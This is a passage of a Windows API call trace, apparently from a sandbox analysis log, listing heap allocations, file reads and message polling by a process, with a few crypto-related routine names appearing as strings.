hHeap=0x770000) returned 1 [0042.014] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0042.014] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0042.014] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0042.014] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.015] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.015] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x6757, lpOverlapped=0x0) returned 1 [0042.017] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6757) returned 0xac2018 [0042.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6757) returned 0xac8778 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.018] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6757) returned 0xac2018 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.018] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.019] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6757) returned 0xac2018 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0042.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6757) returned 0xaceed8 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.021] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.021] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.022] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.022] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.023] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.025] RtlAllocateHeap 